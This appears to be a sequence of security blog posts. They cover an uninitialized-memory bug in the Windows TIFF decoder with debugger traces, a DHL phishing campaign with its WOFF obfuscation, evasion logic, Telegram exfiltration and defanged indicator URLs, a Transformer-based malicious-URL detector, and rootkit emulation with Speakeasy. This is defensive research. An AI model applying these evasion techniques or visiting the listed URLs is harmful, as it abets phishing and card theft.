Unlike the previous vulnerability, the difference in the output is quite limited in this one, as seen in Figure 5. One of the simpler root cause analysis techniques that can be used to figure out a specific type of uninitialized memory usage is comparing execution traces of runs that produce two different outputs. This specific technique can be helpful when an uninitialized variable causes a control flow change in the program and that causes a difference in the outputs. For this, a binary instrumentation script was written, which logged all the instructions executed along with its registers and accessed memory values.

Diffing two distinct execution traces by comparing the instruction pointer (RIP) value, I found a control flow change in windowscodecs!CCCITT::Expand2DLine due to a usage of an uninitialized value. Back tracing the uninitialized value using TTD trace was exceptionally useful for finding the root cause. The following section shows the allocation, population and use of the uninitialized value, which leads to the control flow change and deviance in the pixel outputs.

Allocation

windowscodecs!TIFFReadBufferSetup allocates 0x400 bytes of memory, as shown in Figure 6.

windowscodecs!TIFFReadBufferSetup:
    ...
    allocBuff = malloc(size);
    *(v3 + 16) |= 0x200u;
    *(v3 + 480) = allocBuff;

0:000> k
 # Child-SP          RetAddr           Call Site
00 000000aa`a654f128 00007ff9`4404d4f3 windowscodecs!TIFFReadBufferSetup
01 000000aa`a654f130 00007ff9`4404d3c9 windowscodecs!TIFFFillStrip+0xab
02 000000aa`a654f170 00007ff9`4404d2dc windowscodecs!TIFFReadEncodedStrip+0x91
03 000000aa`a654f1b0 00007ff9`440396dd windowscodecs!CLibTiffDecoderBase::ReadStrip+0x74
04 000000aa`a654f1e0 00007ff9`44115fca windowscodecs!CLibTiffDecoderBase::GetOneUnpackedLine+0x1ad
05 000000aa`a654f2b0 00007ff9`44077400 windowscodecs!CLibTiffDecoderBase::HrProcessCopy+0x4a
06 000000aa`a654f2f0 00007ff9`44048dbb windowscodecs!CLibTiffDecoderBase::HrReadScanline+0x20
07 000000aa`a654f320 00007ff9`44048b40 windowscodecs!CDecoderBase::CopyPixels+0x23b
08 000000aa`a654f3d0 00007ff9`44043c95 windowscodecs!CLibTiffDecoderBase::CopyPixels+0x80
09 000000aa`a654f4d0 00007ff9`4404563b windowscodecs!CDecoderFrame::CopyPixels+0xb5

 

After allocation:
0:000> !heap -p -a @rax
    address 0000029744382140 found in
    _HEAP @ 29735190000
              HEAP_ENTRY Size Prev Flags            UserPtr UserSize - state
        0000029744382130 0041 0000  [00]   0000029744382140    00400 - (busy)
          unknown!noop

//Uninitialized memory after allocation        
0:000> db @rax
00000297`44382140  40 7c 5e 97 29 5d 5f ae-73 31 98 70 b8 4f da ac  @|^.)]_.s1.p.O..
00000297`44382150  06 51 54 18 2e 2a 23 3a-4f ab 14 27 e9 c6 2c 83  .QT..*#:O..'..,.
00000297`44382160  3a 25 b2 f6 9d e7 3c 09-cc a5 8e 27 b0 73 41 a9  :%....<....'.sA.
00000297`44382170  fb 9b 02 b5 81 3e ea 45-4c 0f ab a7 72 e3 21 e7  .....>.EL...r.!.
00000297`44382180  c8 44 84 3b c3 b5 44 8a-c9 6e 4b 2e 40 31 38 e0  .D.;[email protected]
00000297`44382190  85 f0 bd 98 3b 0b ca b8-78 b1 9d d0 dd 4d 61 66  ....;...x....Maf
00000297`443821a0  16 7d 0a e2 40 fa f8 45-4f 79 ab 95 d8 54 f9 44  .}[email protected]
00000297`443821b0  66 26 28 00 b7 96 52 88-15 f0 ed 34 94 5f 6f 94  f&(...R....4._o.

Figure 6: Allocation of memory

Partially Populating the Buffer

0x10 bytes are copied from the input file to this allocated buffer by TIFFReadRawStrip1. The rest of the buffer remains uninitialized with random values, as shown in Figure 7.

if ( !TIFFReadBufferSetup(v2, a2, stripCount) ) {
      return 0i64;
}
if ( TIFFReadRawStrip1(v2, v3, sizeToReadFromFile, "TIFFFillStrip") != sizeToReadFromFile )

 

0:000> r
rax=0000000000000001 rbx=000002973519a7e0 rcx=000002973519a7e0
rdx=0000000000000000 rsi=0000000000000000 rdi=0000000000000010
rip=00007ff94404d58c rsp=000000aaa654f128 rbp=0000000000000000
 r8=0000000000000010  r9=00007ff94416fc38 r10=0000000000000000
r11=000000aaa654ef60 r12=0000000000000001 r13=0000000000000000
r14=0000029744377de0 r15=0000000000000001
iopl=0         nv up ei pl nz na pe nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
windowscodecs!TIFFReadRawStrip1:
00007ff9`4404d58c 488bc4          mov     rax,rsp
0:000> k
 # Child-SP          RetAddr           Call Site
00 000000aa`a654f128 00007ff9`4404d491 windowscodecs!TIFFReadRawStrip1
01 000000aa`a654f130 00007ff9`4404d3c9 windowscodecs!TIFFFillStrip+0x49
02 000000aa`a654f170 00007ff9`4404d2dc windowscodecs!TIFFReadEncodedStrip+0x91
03 000000aa`a654f1b0 00007ff9`440396dd windowscodecs!CLibTiffDecoderBase::ReadStrip+0x74
04 000000aa`a654f1e0 00007ff9`44115fca windowscodecs!CLibTiffDecoderBase::GetOneUnpackedLine+0x1ad
05 000000aa`a654f2b0 00007ff9`44077400 windowscodecs!CLibTiffDecoderBase::HrProcessCopy+0x4a
06 000000aa`a654f2f0 00007ff9`44048dbb windowscodecs!CLibTiffDecoderBase::HrReadScanline+0x20
07 000000aa`a654f320 00007ff9`44048b40 windowscodecs!CDecoderBase::CopyPixels+0x23b
08 000000aa`a654f3d0 00007ff9`44043c95 windowscodecs!CLibTiffDecoderBase::CopyPixels+0x80
09 000000aa`a654f4d0 00007ff9`4404563b windowscodecs!CDecoderFrame::CopyPixels+0xb5

0:000> db 00000297`44382140
00000297`44382140  5b cd 82 55 2a 94 e2 6f-d7 2d a5 93 58 23 00 6c  [..U*..o.-..X#.l             // 0x10 bytes from file
00000297`44382150  06 51 54 18 2e 2a 23 3a-4f ab 14 27 e9 c6 2c 83  .QT..*#:O..'..,.             // uninitialized memory
00000297`44382160  3a 25 b2 f6 9d e7 3c 09-cc a5 8e 27 b0 73 41 a9  :%....<....'.sA.
00000297`44382170  fb 9b 02 b5 81 3e ea 45-4c 0f ab a7 72 e3 21 e7  .....>.EL...r.!.
00000297`44382180  c8 44 84 3b c3 b5 44 8a-c9 6e 4b 2e 40 31 38 e0  .D.;[email protected]
00000297`44382190  85 f0 bd 98 3b 0b ca b8-78 b1 9d d0 dd 4d 61 66  ....;...x....Maf
00000297`443821a0  16 7d 0a e2 40 fa f8 45-4f 79 ab 95 d8 54 f9 44  .}[email protected]
00000297`443821b0  66 26 28 00 b7 96 52 88-15 f0 ed 34 94 5f 6f 94  f&(...R....4._o.

Figure 7: Partial population of memory

Use of Uninitialized Memory

0:000> r
rax=0000000000000006 rbx=0000000000000007 rcx=0000000000000200
rdx=0000000000011803 rsi=0000029744382150 rdi=0000000000000000
rip=00007ff94414e837 rsp=000000aaa654f050 rbp=0000000000000001
 r8=0000029744382550  r9=0000000000000000 r10=0000000000000008
r11=0000000000000013 r12=00007ff94418b7b0 r13=0000000000000003
r14=0000000023006c00 r15=00007ff94418bbb0
iopl=0         nv up ei pl nz na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
windowscodecs!CCCITT::Expand2DLine+0x253:
00007ff9`4414e837 0fb606          movzx   eax,byte ptr [rsi] ds:00000297`44382150=06             ; Uninitialized memory being accessed

 

0:000> db 00000297`44382140
00000297`44382140  5b cd 82 55 2a 94 e2 6f-d7 2d a5 93 58 23 00 6c  [..U*..o.-..X#.l             // 0x10 bytes from file
00000297`44382150  06 51 54 18 2e 2a 23 3a-4f ab 14 27 e9 c6 2c 83  .QT..*#:O..'..,.             // uninitialized memory
00000297`44382160  3a 25 b2 f6 9d e7 3c 09-cc a5 8e 27 b0 73 41 a9  :%....<....'.sA.
00000297`44382170  fb 9b 02 b5 81 3e ea 45-4c 0f ab a7 72 e3 21 e7  .....>.EL...r.!.
00000297`44382180  c8 44 84 3b c3 b5 44 8a-c9 6e 4b 2e 40 31 38 e0  .D.;[email protected]
00000297`44382190  85 f0 bd 98 3b 0b ca b8-78 b1 9d d0 dd 4d 61 66  ....;...x....Maf
00000297`443821a0  16 7d 0a e2 40 fa f8 45-4f 79 ab 95 d8 54 f9 44  .}[email protected]
00000297`443821b0  66 26 28 00 b7 96 52 88-15 f0 ed 34 94 5f 6f 94  f&(...R....4._o.

 

0:000> k
 # Child-SP          RetAddr           Call Site
00 000000aa`a654f050 00007ff9`4414df80 windowscodecs!CCCITT::Expand2DLine+0x253
01 000000aa`a654f0d0 00007ff9`4412afcc windowscodecs!CCCITT::CCITT_Expand+0xac
02 000000aa`a654f120 00007ff9`4404d3f0 windowscodecs!CCITTDecode+0x7c
03 000000aa`a654f170 00007ff9`4404d2dc windowscodecs!TIFFReadEncodedStrip+0xb8
04 000000aa`a654f1b0 00007ff9`440396dd windowscodecs!CLibTiffDecoderBase::ReadStrip+0x74
05 000000aa`a654f1e0 00007ff9`44115fca windowscodecs!CLibTiffDecoderBase::GetOneUnpackedLine+0x1ad
06 000000aa`a654f2b0 00007ff9`44077400 windowscodecs!CLibTiffDecoderBase::HrProcessCopy+0x4a
07 000000aa`a654f2f0 00007ff9`44048dbb windowscodecs!CLibTiffDecoderBase::HrReadScanline+0x20
08 000000aa`a654f320 00007ff9`44048b40 windowscodecs!CDecoderBase::CopyPixels+0x23b
09 000000aa`a654f3d0 00007ff9`44043c95 windowscodecs!CLibTiffDecoderBase::CopyPixels+0x80
0a 000000aa`a654f4d0 00007ff9`4404563b windowscodecs!CDecoderFrame::CopyPixels+0xb5

Figure 8: Reading of uninitialized value

Depending on the uninitialized value (Figure 8), different code paths are taken in Expand2DLine, which will change the output pixels, as shown in Figure 9.

  {
    {
        if ( v11 != 1 || a2 )
        {
            unintValue = *++allocBuffer | (unintValue << 8);          // uninit mem read
        }
        else
        {
            unintValue <<= 8;
            ++allocBuffer;
        }
        --v11;
        v16 += 8;
      }
      v29 = unintValue >> (v16 - 8);
      dependentUninitValue = *(l + 2i64 * v29);                           
      v16 -= *(l + 2i64 * v29 + 1);
      if ( dependentUninitValue >= 0 )             // path 1
        break;
      if ( dependentUninitValue < '\xC0' )
        return 0xFFFFFFFFi64;                     // path 2
  }
  if ( dependentUninitValue <= 0x3F )              // path xx
      break;

Figure 9: Use of uninitialized memory in if conditions

Patch

Microsoft decided to patch this vulnerability by using calloc instead of malloc, which initializes the allocated memory with zeros.

Conclusion

Part Two of this blog series presents multiple vulnerabilities in Windows’ built-in image parsers. In the next post, we will explore newer supported image formats in Windows such as RAW, HEIF and more.

Phishing Campaign Leverages WOFF Obfuscation and Telegram Channels for Communication

26 January 2021 at 20:45

FireEye Email Security recently encountered various phishing campaigns, mostly in the Americas and Europe, using source code obfuscation with compromised or bad domains. These domains were masquerading as authentic websites and stole personal information such as credit card data. The stolen information was then shared to cross-platform, cloud-based instant messaging applications.

Coming off a busy holiday season with a massive surge in deliveries, this post highlights a phishing campaign involving a fake DHL tracking page. While phishing attacks targeting users of shipping services is not new, the techniques used in these examples are more complex than what would be found in an off-the-shelf phishing kit.

This campaign uses a WOFF-based substitution cypher, localization specific targeting, and various evasion techniques which we unravel here in this blog.

Attack Flow

The attack starts with an email imitating DHL, as seen in Figure 1. The email tries to trick the recipient into clicking on a link, which would take them to a fake DHL website. In Figure 2, we can see the fake page asking for credit card details that, if submitted, would give the user a generic response while in the background the credit card data is shared with the attackers.


Figure 1: DHL phishing attempt


Figure 2: Fake website imitating DHL tracking

This DHL phishing campaign uses a rare technique for obfuscating its source page. The page source contains proper strings, valid tags, and appropriate formatting, but contains encoded text that would render gibberish without decoding prior to loading the page, as seen in Figure 3. Typically, decoding such text is done by including script functions within the code. Yet in this case, the decoding functions are not contained in the script.


Figure 3: Snippet of the encoded text on page source

The decoding is done by a Web Open Font Format (WOFF) font file, which happens upon loading the page in a browser and will not be visible in the page content itself. Figure 4 shows the substitution cipher method and the WOFF font file. The attacker does this to evade detection by security vendors. Many security vendors use static or regex signature-based rules, so this method will break those naïve-based conditions.


Figure 4: WOFF substitution cipher

Loading this custom font which decodes the text is done inside the Cascading Style Sheets (CSS). This technique is rare as JavaScript functions are traditionally used to encrypt and decrypt HTML text.


Figure 5: CSS file for loading WOFF font file

Figure 5 shows the CSS file used to load the WOFF font file. We have also seen the same CSS file, style.css, being hosted on the following domains:

  • hxxps://www.lifepointecc[.]com/wp-content/sinin/style.css
  • hxxps://candyman-shop[.]com/auth/DHL_HOME/style.css
  • hxxps://mail.rsi-insure[.]com/vendor/ship/dhexpress/style.css
  • hxxps://www.scriptarticle[.]com/thro/HOME/style.css

These legitimate-looking domains are not hosting any phishing websites as of now; instead, they appear to be a repository for attackers to use in their phishing campaigns. We have seen similar phishing attacks targeting the banking sector in the past, but this is newer for delivery websites.  

Notable Techniques

Localization

The phishing page displays the local language based on the region of the targeted user. The localization code (Figure 6) supports major languages spoken in Europe and the Americas such as Spanish, English, and Portuguese.


Figure 6: Localization code

The backend contains PHP resource files for each supported language (Figure 7), which are picked up dynamically based on the user’s IP address location.


Figure 7: Language resource files

Evasion

This campaign employs a variety of techniques to evade detection. This will not serve up a phishing page if the request came from certain blocked IP addresses. The backend code (Figure 8) served the users with a "HTTP/1.1 403 Forbidden" response header under the following conditions:

  • IP has been seen five times (AntiBomb_User func)
  • IP host resolves to its list of avoided host names ('google', 'Altavista', 'Israel', 'M247', 'barracuda', 'niw.com.au' and more) (AntiBomb_WordBoot func)
  • IP is on its own local blocklist csv (x.csv in the kit) (AntiBomb_Boot func)
  • IP has seen POSTing three times (AntiBomb_Block func)


Figure 8: Backend evasion code

After looking at the list of blocked hosts, we could deduce that the attackers were trying to block web crawlers.

Data Theft

The attackers behind this phishing campaign attempted to steal credentials, credit card data, and other sensitive information. The stolen data is sent to email addresses and Telegram channels controlled by the attacker. We uncovered a Telegram channel where data is being sent using the Telegram Bot API shown in Figure 9.


Figure 9: Chat log

While using php mail() function to send stolen credentials is quite common, in the near past, encrypted instant messaging applications such as Telegram have been used for sending phished information back to command and control servers.

We were able to access one of the Telegram channels controlled by the attacker as shown in Figure 10. The sensitive information being sent in the chat includes IP addresses and credit card data.


Figure 10: Telegram channel with stolen information

Conclusion

Attackers (and especially phishers) are always on the hunt for new ways to evade detection by security products. Obfuscation gives the attackers an edge, and makes it harder for security vendors to protect their customers.

By using instant messaging applications, attackers get user data in real time and victims have little to respond once their personal information is compromised.

Indicators of Compromise (IOC)

FireEye Email Security utilizing FAUDE (FireEye Advanced URL Detection Engine) protects customers from these types of phishing threats. Unlike traditional anti-phishing techniques dependent on static inspection of phishing URL content, FAUDE uses multiple artificial intelligence (AI) and machine learning (ML) engines to more effectively thwart these attacks.

From December 2020 until the time of posting, our FAUDE detection engine saw more than 100 unique URLs hosting DHL phishing pages with obfuscated source code, including:

  • hxxps://bit[.]ly/2KJ03RH
  • hxxps://greencannabisstore[.]com/0258/redirect-new.php
  • hxxps://directcallsolutions[.]co[.]za/CONTACT/DHL_HOME/
  • hxxps://danapluss[.]com/wp-admin/dhl/home/
  • hxxp://r.cloudcyberlink[.]digital/<path> (multiple paths using same domain)
Email Addresses
Telegram Users
  • @Saitama330
  • @cameleon9
style.css
  • Md5: 83b9653d14c8f7fb95d6ed6a4a3f18eb)
  • Sha256: D79ec35dc8277aff48adaf9df3ddd5b3e18ac7013e8c374510624ae37cdfba31
font-woff2
  • MD5: b051d61b693c76f7a6a5f639177fb820
  • SHA-256: 5dd216ad75ced5dd6acfb48d1ae11ba66fb373c26da7fc5efbdad9fd1c14f6e3
Domains

Pradosdemojanda[.]com

global-general-trackks.supercarhiredubai[.]com

tracking-dhi.company

Tapolarivercamp[.]com

Rosariumvigil[.]com

Mydhlexpert[.]com

Autorepairbyfradel[.]com

URLs

hxxps://wantirnaosteo[.]com[.]au/logon/home/MARKET/F004f19441/11644210b.php

hxxps://ekartenerji[.]com[.]tr/wp-admin/images/dk/DHL/home.php

hxxps://aksharapratishthan[.]org/admin/imagess/F004f19441/sms1.php

hxxps://royalgateedu[.]com/wp-content/plugins/elementor/includes/libraries/infos/package/F004f19441/00951124a.php

hxxps://vandahering[.]com[.]br/htacess

hxxps://hkagc[.]com/man/age/F004f19441/11644210b.php

hxxps://fiquefitnes[s]comsaude[.]com/.well-known/MARKET/MARKET/F004f19441/11644210b.php

hxxps://juneispearlmonth[.]com/-/15454874518741212/dhl-tracking/F004f19441/00951124a.php

hxxps://www.instantcopywritingscript[.]com/blog/wp-content/22/DHL/MARKET

hxxps://isss[.]sjs[.]org[.]hk/wp-admin/includes/F004f19441/11644210b.php

hxxps://www.concordceramic[.]com/fr/frais/F004f19441/11644210b.php

hxxps://infomediaoutlet[.]com/oldsite/wp-content/uploads/2017/02/MARKET/

hxxps://wema-wicie[.]pl/dh/l/en/MARKET

hxxps://www.grupoindustrialsp[.]com/DHL/MARKET/

hxxps://marrecodegoias[.]com[.]br/wp-snapshots/activat/MARKET/F004f19441/11644210b.php

hxxps://villaluna[.]de/wp-content/info/MARKET/F004f19441/11644210b.php

hxxp://sandur[.]dk/wp-content/upgrade/-/MARKET/

hxxps://chistimvse[.]com/es/dhl/MARKET/

hxxps://detmayviet[.]com/wp-includes/widgets/-/MARKET/F004f19441/11644210b.php

hxxps://dartebreakfast[.]com/wp-content/plugins/dhl-espress/MARKET/

hxxps://genesisdistributors[.]com/-/Tracking/dhl/Tracking/dhl-tracking/F004f19441/00951124a.php

hxxps://www.goldstartechs[.]com/wp-admin/js/widgets/102/F004f19441/11644210b.php

hxxps://universalpublicschooltalwandisabo[.]com/DHL

hxxps://intranet[.]prorim[.]org[.]br/info/MARKET/F004f19441/11644210b.php

hxxps://administrativos[.]cl/mail.php

hxxps://nataliadurandpsicologa[.]com[.]br/upgrade/MARKET/F004f19441/11644210b.php

hxxps://tanaxinvest[.]com/en/dhl/MARKET/

hxxps://deepbluedivecenter[.]com/clear/item/

hxxps://keystolivingafulfilledlife[.]com/wp-admin/includes/daspoe99i3mdef/DOCUNTRITING

hxxps://juneispearlmonth[.]com/-/15454874518741212/dhl-tracking/F004f19441/00951124a.php

Training Transformers for Cyber Security Tasks: A Case Study on Malicious URL Prediction

21 January 2021 at 17:30

Highlights       

  • Perform a case study on using Transformer models to solve cyber security problems
  • Train a Transformer model to detect malicious URLs under multiple training regimes
  • Compare our model against other deep learning methods, and show it performs on-par with other top-scoring models
  • Identify issues with applying generative pre-training to malicious URL detection, which is a cornerstone of Transformer training in natural language processing (NLP) tasks
  • Introduce novel loss function that balances classification and generative loss to achieve improved performance on the malicious URL detection task

Introduction

Over the past three years Transformer machine learning (ML) models, or “Transformers” for short, have yielded impressive breakthroughs in a variety of sequence modeling problems, specifically natural language processing (NLP). For example, OpenAI’s latest GPT-3 model is capable of generating long segments of grammatically-correct prose from scratch. Spinoff models, such as those developed for question and answering, are capable of correlating context over multiple sentences. AI Dungeon, a single and multiplayer text adventure game, uses Transformers to generate plausible unlimited content in a variety of fantasy settings. Transformers’ NLP modeling capabilities are apparently so powerful that they pose security risks in their own right, in terms of their potential power to spread disinformation, yet on the other side of the coin, they can be used as powerful tools to detect and mitigate disinformation campaigns. For example, in previous research by the FireEye Data Science team, a NLP Transformer was fine-tuned to detect disinformation on social media sites.

Given the power of these Transformer models, it seems natural to wonder if we can apply them to other types of cyber security problems that do not necessarily involve natural language, per se. In this blog post, we discuss a case study in which we apply Transformers to malicious URL detection. Studying Transformer performance on URL detection problem is a first logical step to extending Transformers to more generic cyber security tasks, since URLs are not technically natural language sequences but share some common characteristics with NLP.

In the following sections, we outline a typical Transformer architecture and discuss how we adapt it to URLs with a character-focused tokenization. We then discuss loss functions we employ to guide the training of the model, and finally compare our training approaches to more conventional ML-based modeling options.

Adapting Transformers to URLs

Our URL Transformer operates at the character level, where each character in the URL corresponds to an input token. When a URL is input to our Transformer, it is appended with special tokens—a classification token (“CLS”) that conditions the model to produce a prediction and padding tokens (“PAD”) that normalize the input to a fixed length to allow for parallel training. Each token in the input string is then projected into a character embedding space, followed by a stack of Attention and Feed-Forward Neural Network (FFNN) layers. This stack of layers is similar to the architecture introduced in the original Transformers paper. At a high level, the Attention layers allow each input to be associated with long-distance context of other characters that are important for the classification task, similar to the notion of attention in humans, while the FFNN layers provide capacity for learning the relationships among the combination of inputs and their respective contexts. An illustration of our architecture is shown in Figure 1.

Additionally, the URL Transformer employs a masking strategy in its Attention calculation, which enforces a left-to-right (L-R) dependence. This means that only input characters from the left of a given character influence that character’s representation in each layer of the attention stack. The network outputs one embedding for each input character, which captures all information learned by the model about the character sequence up to that point in the input.

Once the model is trained, we can use the URL Transformer to perform several different tasks, such as generatively predicting the next character in the input sequence by using the sequence embedding () as an input to another neural network with as softmax output over the possible vocabulary of characters. A specific example of this is shown in Figure 1, where we take the embedding of the input “firee”() and use it to predict the next most likely character, “y.” Similarly, we can use the embedding produced after the classification token to predict other properties of the input sequences, such as their likelihood of maliciousness.


Figure 1: High-level overview of the URL Transformer architecture

Loss Functions and Training Regimes

With the model architecture in hand, we now turn to the question of how we train the model to most effectively detect malicious URLs. Of course, we can train this model in a similar way to other supervised deep learning classifiers by: (1) making predictions on samples from a labeled training set, (2) using a loss function to measure the quality of our predictions, and (3) tune model parameters (i.e., weights) via backpropagation. However, the nature of the Transformer model allows for several interesting variations to this training regime. In fact, one of the reasons that Transformers have become so popular for NLP tasks is because they allow for self-supervised generative pre-training, which takes advantage of massive amounts of unlabeled data to help the model learn general characteristics of the input language before being fine-tuned on the ultimate task at-hand (e.g., question answering, sentiment analysis, etc.). Here, we outline some of the training regimes we explored for our URL Transformer model.

Direct Label Prediction (Decode-To-Label)

Using a training set of URLs with malicious and benign labels, we can treat the URL Transformer architecture as a feature extractor, whose outputs we use as the input to a traditional classifier (e.g., FFNN or even a random forest). When using a FFNN as our classifier, we can backpropagate the classification loss (e.g., binary cross-entropy) through both the classifier and the Transformer network to adjust the weights to perform classification. This training regime is the baseline for our experiments and is how most deep learning models are trained for classification tasks.

Next-Character Prediction Pre-Training and Fine-Tuning

Beyond the baseline classification training regime, the NLP literature suggests that one can learn a self-supervised embedding of the input sequence by training the Transformer to perform a next-character prediction task, then fine-tuning the learned representation for the classification problem. A key advantage of this approach is that data used for pre-training does not require malicious or benign labels; instead, the next characters in a URL serve as the labels to be predicted from prior characters in the sequence. This is similar to the example given in Figure 1, where the embedding output is used to predict the next character, “y,” in “fireeye.com.” Overall, this training regime allows us to take advantage of the massive amount of unlabeled data that is typically available in cyber security-related problems.

The overall structure of the architecture for this regime is similar to the aforementioned binary classification task, with FFNN layers added for classification. However, since we are now predicting multiple classes (i.e., one class per input character in the vocabulary), we must apply a softmax function to the output to induce a probability distribution over the potential output characters. Once the Transformer portion of the network is pre-trained in this way, we can swap the FFNN classification layers focused on character prediction with new layers that will be trained for the malicious URL classification problem, as in the decode-to-label case.

Balanced Mixed-Objective Training

Prior work has shown that imbuing the training process with additional knowledge outside of the primary task can help constrain the learning process, and ultimately result in better models. For instance, a malware classifier might train using loss functions that capture malicious/benign classification, malware family prediction, and tag prediction tasks as a mechanism to provide the classifier with broader understanding of the problem than looking at malicious/benign labels in isolation.

Inspired by these findings, we also introduced a mixed-objective training regime for our URL Transformer, where we train for binary classification and next-character prediction simultaneously. At each iteration of training, we compute a loss multiplier such that each loss contribution is fixed prior to backpropagation. This ensures that neither loss term dominates during training. Specifically, for minibatch i, let the net loss LMixed be computed as follows:

 

Given hyperparameters a and b, defined such that a + b: = 1, we compute constant a so that the net loss contribution of LCLS to LMixed is a and the net contribution of LNext to LMixed is b. For our evaluations, we set a := b := 0.5, effectively requiring that the model equally balance its ability to generate the next character and accurately predict malicious URLs.

Evaluation

To evaluate our URL Transformer model and better understand the impact of the three training regimes discussed earlier, we collected a training dataset of over 1M labeled malicious and benign URLs, which was split into roughly 700K training samples, 100K validation samples, and 200k test samples. Additionally, we also developed an unlabeled pre-training dataset of 20M URLs.

Using this data, we performed four different training runs for our Transformer model:

  1. DecodeToLabel (Baseline): Using strictly the binary cross-entropy loss on the embedded classification features over the entire sequence, we trained the model for 15 epochs using the training set.
  2. MixedObjective: We trained the model for 15 epochs on the training set, using both the embedded classification features and the embedded next-character prediction features.
  3. FineTune: We pre-trained the model for 15 epochs on the next-character prediction task using the training set, ignoring the malicious/benign labels. We then froze weights over the first 16 layers of the model and trained the model for an additional 15 epochs using a binary cross-entropy loss on the classification labels.
  4. FineTune 20M: We performed pre-training on the next-character prediction task using the 20M URL dataset, pre-training for 2 epochs. We then froze weights over the first 16 layers of the Transformer and trained for 15 epochs on the binary classification task.

The ROC curve shown in Figure 2 compares the performance of these four training regimes. Here, our baseline DecodeToLabel model (red) yielded a ROC curve with 0.9484 AUC, while the MixedObjective model (green) slightly outperformed the baseline with an AUC of 0.956. Interestingly, both of the fine-tuning models yielded poor classification results, which is counter to the established practice of these Transformer models in the NLP domain.


Figure 2: ROC curves for four URL Transformer training regimes

To assess the relative efficacy of our Transformer models on this dataset, we also fit several other types of benchmark models developed for URL classification: (1) a Random Forest model on SME-derived features, (2) a 1D Convolutional Neural Network (CNN) model on character embeddings, and (3) a Long Short-Term Memory (LSTM) neural network on character embeddings. Details of these models can be found in our white paper, however we find that our top performing Transformer model performs on-par with the best performing non-Transformer baseline (a 1D CNN model), which perhaps indicates that the long-range dependencies typically learned by Transformer models are not as useful in the case of malicious URL detection.


Figure 3: ROC curves comparing URL Transformer to other benchmark URL classification models

Summary

Our experiments suggest that Transformers can achieve performance comparable to or better than that of other top-performing models for URL classification, though the details of how to achieve that performance differ from common practice. Contrary to findings from the NLP domain, wherein self-supervised pre-training substantially enhances performance in a fine-tuned classification task, similar pretraining approaches actually diminish performance for malicious URL detection. This suggests that the next character prediction task has too little apparent correlation with the task of malicious/benign prediction for effective/stable transfer.

Interestingly, utilizing next-character prediction as an auxiliary loss function in conjunction with a malicious/benign loss yields improvements over training solely to predict the label. We hypothesize that while pre-training leads to a relatively poor generative model due to randomized content in the URLs within our dataset, a malicious/benign loss may serve to better condition the generative model learned by the next-character prediction task, distilling a subset of relevant information. It may also be the case that the long-distance relationships that are key to the generative pre-training task are not as important for the final malicious URL classification, as evidenced by the performance of the 1D CNN model.

Note that we did not perform a rigorous hyperparameter search for our Transformer, since this research was primarily concerned with loss functions and training regimes. Therefore, it is still an open question as to whether a more optimal architecture, specifically designed for this classification task, could substantially outperform the models described here.

While our URL dataset is not representative of all data in the cyber security space, the difficulty of obtaining a readily fine-tuned model from self-supervised pre-training suggests that this approach is unlikely to work well for training Transformers on longer sequences or sequences with lesser resemblance to natural language (e.g., PE files), but an auxiliary loss might work.

Details about this research and additional results can be found in our associated white paper.

Emulation of Kernel Mode Rootkits With Speakeasy

20 January 2021 at 16:45

In August 2020, we released a blog post about how the Speakeasy emulation framework can be used to emulate user mode malware such as shellcode. If you haven’t had a chance, give the post a read today.

In addition to user mode emulation, Speakeasy also supports emulation of kernel mode Windows binaries. When malware authors employ kernel mode malware, it will often be in the form of a device driver whose end goal is total compromise of an infected system. The malware most often doesn’t interact with hardware and instead leverages kernel mode to fully compromise the system and remain hidden.

Challenges With Dynamically Analyzing Kernel Malware

Ideally, a kernel mode sample can be reversed statically using tools such as disassemblers. However, binary packers just as easily obfuscate kernel malware as they do user mode samples. Additionally, static analysis is often expensive and time consuming. If our goal is to automatically analyze many variants of the same malware family, it makes sense to dynamically analyze malicious driver samples.

Dynamic analysis of kernel mode malware can be more involved than with user mode samples. In order to debug kernel malware, a proper environment needs to be created. This usually involves setting up two separate virtual machines as debugger and debugee. The malware can then be loaded as an on-demand kernel service where the driver can be debugged remotely with a tool such as WinDbg.

Several sandbox style applications exist that use hooking or other monitoring techniques but typically target user mode applications. Having similar sandbox monitoring work for kernel mode code would require deep system level hooks that would likely produce significant noise.

Driver Emulation

Emulation has proven to be an effective analysis technique for malicious drivers. No custom setup is required, and drivers can be emulated at scale. In addition, maximum code coverage is easier to achieve than in a sandbox environment. Often, rootkits may expose malicious functionality via I/O request packet (IRP) handlers (or other callbacks). On a normal Windows system these routines are executed when other applications or devices send input/output requests to the driver. This includes common tasks such as reading, writing, or sending device I/O control (IOCTLs) to a driver to execute some type of functionality.

Using emulation, these entry points can be called directly with doped IRP packets in order to identify as much functionality as possible in the rootkit. As we discussed in the first Speakeasy blog post, additional entry points are emulated as they are discovered. A driver’s DriverMain entry point is responsible for initializing a function dispatch table that is called to handle I/O requests. Speakeasy will attempt to emulate each of these functions after the main entry point has completed by supplying a dummy IRP. Additionally, any system threads or work items that are created are sequentially emulated in order to get as much code coverage as possible.

Emulating a Kernel Mode Implant

In this blog post, we will show an example of Speakeasy’s effectiveness at emulating a real kernel mode implant family publicly named Winnti. This sample was chosen despite its age because it transparently implements some classic rootkit functionality. The goal of this post is not to discuss the analysis of the malware itself as it is fairly antiquated. Rather, we will focus on the events that are captured during emulation.

The Winnti sample we will be analyzing has SHA256 hash c465238c9da9c5ea5994fe9faf1b5835767210132db0ce9a79cb1195851a36fb and the original file name tcprelay.sys. For most of this post, we will be examining the emulation report generated by Speakeasy. Note: many techniques employed by this 32-bit rootkit will not work on modern 64-bit versions of Windows due to Kernel Patch Protection (PatchGuard) which protects against modification of critical kernel data structures.

To start, we will instruct Speakeasy to emulate the kernel driver using the command line shown in Figure 1. We instruct Speakeasy to create a full memory dump (using the “-d” flag) so we can acquire memory later. We supply the memory tracing flag (“-m”) which will log all memory reads and writes performed by the malware. This is useful for detecting things like hooking and direct kernel object manipulation (DKOM).


Figure 1: Command line used to emulate the malicious driver

